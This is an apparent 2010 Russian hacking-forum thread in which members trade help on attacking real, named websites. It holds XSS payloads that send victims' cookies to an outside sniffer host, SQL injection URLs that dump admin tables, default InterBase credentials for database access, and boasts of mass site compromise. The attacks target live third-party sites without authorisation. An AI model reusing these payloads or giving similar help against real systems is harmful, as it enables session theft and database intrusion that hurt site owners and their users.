ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопросы по уязвимостям (https://forum.antichat.xyz/showthread.php?t=8037122)

stan_q 30.09.2010 01:00

Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.

Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.

Norton710 09.10.2010 01:00

Вобщем проблемма такая) Нашел уязвимость на рандомном сайте

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



alert('') выполняется при вводе

code:

'>">alert(/XSS/)

в строку поиска или в адресную строку.

Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..

Сообственно тело скрипта

code:

">
img = new Image(); img.src = "Адресс снифа"+document.cookie;

Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)

p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..

stan_q 09.10.2010 01:00

Срабатывает так:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Используй код для пассивной атаки из настроек нашего снифера

Norton710 09.10.2010 01:00

stan_q, да, так прокатило =) спасибо большое))

тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)

Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)

stan_q 09.10.2010 01:00

Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.

[offtop] Мой 1000-й пост [/offtop]

Norton710 09.10.2010 01:00

stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу

Если фильтр изменяет символы
code:

"

, еще есть шанс замутить активную XSS или только пасивную?

В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?

p.s. Гц с юбилейным постом =)

Norton710 13.10.2010 01:00

Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление

code:

[JPG][/JPG]

Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее

code:

http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')

картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?

p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)

p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)

Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)

M@ZAX@KEP 15.10.2010 01:00

Цитата:


Что можно еще попробовать сделать с скриптом?



HTML highlight

где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки

Norton710 15.10.2010 01:00

M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)

lesha_firs 16.10.2010 01:00

Такой вопрос!
Вот сайт
http://teploe-okno.ru/page.php?pid=-1

возврашает 2 ошибки одна в левом столбце это sql ошибка! до неё я не смог добраться((
а внизу перед footer возникает такая ошибка

code:

Warning: is_dir() [function.is-dir]: open_basedir restriction in effect. File(/var/www/vhosts/teploe-okno.ru/httpdocs/hpics/1/) is not within the allowed path(s): (/home/users2/k/karakovski/:/usr/local/lib/php/:/tmp/) in /home/users2/k/karakovski/domains/teploe-okno.ru/page.php on line 31

как я знаю is_dir()
булевая функция опредиляюшие евляеться ли файл дирикторией!

Вот у меня вопрос это значит что файл подгружаеться из дериктории get параметром??
если да то что можно сделать??
и вообще что можно сделать?

stan_q 16.10.2010 01:00

Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1

Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.

lesha_firs 16.10.2010 01:00

Цитата:

Сообщение от stan_q

Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1

Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.

да это уже не суть важно я и так смог добраться до базы)))

примерно 100 сайтов за раз раскрыл и видео снял)))
если интересно)) http://zalil.ru/upload/29821677

Добавлено через 5 часов 28 минут
вот нашел сайт все перепробывал что знал даже версию узнать не могу((

подскажите

code:

http://www.turkishculturalfoundation.org/pages.php?ID=1%27

Добавлено через 5 часов 39 минут
Кстате там еще и поис %27 не воспринимает точней ошибку выдает)))
а как через поиск ломать также?

M@ZAX@KEP 11.11.2010 01:00

hugolom, что тебя смущает в первом? Когда пишешь и оно выводит, это кагбэ почти пассивка. Но там htmlspecialchars, так что кури бамбук.

Что ты получаешь во втором я не знаю, я получаю "документ не найден", то бишь 404. И я вообще не вижу, какому ты там скрипту пытался передать код с алертом и что это ещё за локальные протоколы file:// ?!

В 3 у тебя чистое раскрытие пути, но зачем ты натыкал слэшей перед news в адресе? Типа красивее? :ag: И никакого локального инклуда там нет, что ты пытался там сделать - непонятно))) /etc/passwd ты там так точно не поимеешь.

hugolom 11.11.2010 01:00

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

M@ZAX@KEP 12.11.2010 01:00

hugolom, нет. Для того оно и сделано)) Обсуждал я недавно эту тему с кем-то в лс... пришли к тому, что можно надеяться только на человеческий фактор - что не весь ввод так фильтруется, что где-нибудь, что-нибудь да забыли, пропустили.

hugolom 12.11.2010 01:00

Тогда как можно обойти чтоли htmlspecialchars? есть варианты?

onekey_nw 16.11.2010 01:00

Люди вот вопрос.

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



при подстановки в поля

code:

">alert()

вылазит окошечко.
я так понял это пассивная xss
что с ней делать дальше.
зы. или скиньте ссылки на норм статьи по xss а то по гуглу всего 2 нормальные гуляют из которых мало что ясно.

Norton710 19.11.2010 01:00

По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.

500mhz 19.11.2010 01:00

Цитата:


По идеи, используя логин SYSDBA и пароль masterkey, сможешь подключиться к СУБД сервера.



а не покажеш на шкриншотах как ты это делаеш а?

Norton710 19.11.2010 01:00

Качаешь программу InterBase для подключения к СУБД а дальше только ручками, ручками.. Скрин рук присылать нужно, или догадаешься что это?

500mhz 19.11.2010 01:00

нас в пту еше этому не учили, вот и просю гуру хацкинга пролить свет на проблему.

Oro4imaru 19.11.2010 01:00

сканер показал уязвимость на сесвере
Цитата:


5.37 уязвимость Порт 3050/tcp - InterBase 192.168.0.210 [SERVER]

Имя сервиса : InterBase SQL Server

5.37.1 пароль по умолчанию 192.168.0.210 [SERVER], уязвимость3050/tcp - InterBase

Описание
Пользователь 'SYSDBA' имеет стандартный пароль 'masterkey'.
Решение
Изменить пароль.



что можно получить используя ее и как ее использовать?

с меня спасибо!

500mhz 19.11.2010 01:00

с правами SYSDBA , ну ребетнуть или вырубить сможеш к примеру , сбэкапить тоже, востановить.

sider56 24.11.2010 01:00

Скрытый текст (вы должны быть авторизованы и иметь 30 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



вот нащёл xss чё с ней делать дальше???

hugolom 24.11.2010 01:00

Можешь украсть сессию!!11 статей полно по этой теме

hugolom 29.11.2010 01:00

Есть ли где нить литература\статьи по поиску уязвимостей в движках?
т.е. если есть сорс его.

M@ZAX@KEP 30.11.2010 01:00

hugolom, есть конечно.

Beelzebul 05.12.2010 01:00

Застрял

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Получается почему то только последние

Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



а там белеберда.
Не пойму почему другие не поддаются или я не выспался?

stan_q 05.12.2010 01:00

Цитата:

Сообщение от kimpossible

народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6-- остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73-- http://old.cageprisoners.com/article...+from+admins--

Ошибка в запросе: вместо column_name написал table_name.
Правильный запрос http://old.cageprisoners.com/article...61646d696e73--
Дальше, думаю, разберешься

Добавлено через 5 минут

Цитата:

Сообщение от Beelzebul

Застрял Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): http://www.beliodobrom.by/ru/agromas...p_concat%28tab le_name%29,10,11,12,13,14,15,16,17,18,19,20+from+i nformation_schema.tables+limit+0,1 Получается почему то только последние Скрытый текст, требуется 1 сообщение(ий) (сейчас у вас 1053): beliodobrom,beliodobrom0001 а там белеберда. Не пойму почему другие не поддаются или я не выспался?

А других там и нет. Такое тоже бывает

kimpossible 05.12.2010 01:00

народ помогите с сайтом http://old.cageprisoners.com/article...sion(),4,5,6--
остановился тут дальше незнаю че делать http://old.cageprisoners.com/article...61646d696e73--

http://old.cageprisoners.com/article...+from+admins--

Frinst 06.12.2010 01:00

Нашел скулю:

Скрытый текст (вы должны быть авторизованы и иметь 2 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Кол-во столбцов:8

Версия: 5.5.6

Есть столбец Ad_user,но я не могу его открыть,выдает просто ошибку.Помогите.
Если надо все пошаговые действия скину

P.S Там все таки есть скуля :rolleyes:

Frinst 07.12.2010 01:00

Но в каком нибудь из этих столбцов должны же хранится пароли?Я прав?

-=angel=- 07.12.2010 01:00

Скрытый текст (вы должны быть авторизованы и иметь 23 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

Frinst 07.12.2010 01:00

Не один хеш не удается расшифровать

Norton710 07.12.2010 01:00

Frinst, честно говоря недумая вбил в программу Havij и она сразу все таблицы вывела =P Ad_user там есть, вот её колонки:
ip / data / title / name / id
Под нэймом идёт логин, паролей мною увидено не было)
еще есть столбец users, он поинтереснее.. но паролей там тоже нету =/

maxarr 10.12.2010 01:00

Всем здрасте!
Вот сайт:

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Если в форме авторизации в поле логин подставить кавычку, ну в общем увидите результат..
Вопрос как можно дальше раскрутить? SIPT знаю совсем чуть-чуть. Я так понимаю в SIPT надо выбрать :
Injection type - Post data..

SERGEJKA 14.12.2010 01:00

ставиш в конце ковычку ` например site.ru/index.php?id=1` если будет ошибка значит можно делать иньекцию! если хоч ЛС нипишы помогу чем смогу!

sider56 14.12.2010 01:00

если при поиске sql находишь сайт типа

code:

site.ru/index.php?id=1

то тогда если вместо ?id=1 подставить ?id=2 толк будет??тоесть если в ?id=1 нет иньекции то и в ?id=2 ?id=3 тоже не будет иньекции???

maxarr 14.12.2010 01:00

Толку не будет.читай здесь

sider56 14.12.2010 01:00

а если напремер не

Цитата:


site.ru/index.php?id=1



а

Цитата:


site.ru/langage.php?id=1



Будет толк???


Время: 08:13